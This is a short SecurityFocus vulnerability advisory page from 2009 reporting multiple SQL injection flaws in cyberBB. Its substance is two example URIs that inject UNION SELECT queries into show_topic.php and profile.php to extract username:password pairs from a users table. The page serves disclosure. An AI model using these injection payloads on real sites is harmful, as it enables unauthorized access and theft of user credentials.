Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

cyberBB Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*

http://www.example.com/profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*







 

Privacy Statement
Copyright 2009, SecurityFocus